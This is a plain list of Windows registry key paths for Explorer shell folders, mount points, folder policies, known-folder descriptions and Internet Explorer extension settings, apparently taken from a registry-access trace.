HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ActivityMeterDisable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\QuickTabsThreshold
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\clsid
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT\*
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Ext
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4F3C-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{2670000A-7350-4f3c-8081-5663EE0C6C49}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Default Visible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\clsid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Type
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Count
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore\Time
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Lang0409
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\ButtonText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuText
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuCustomize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\MenuStatusBar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\Extensions\CmdMapping\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Default Visible
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{2670000A-7350-4f3c-8081-5663EE0C6C49}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\Icon
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\LinksExplorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\ThumbnailBehavior
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Height
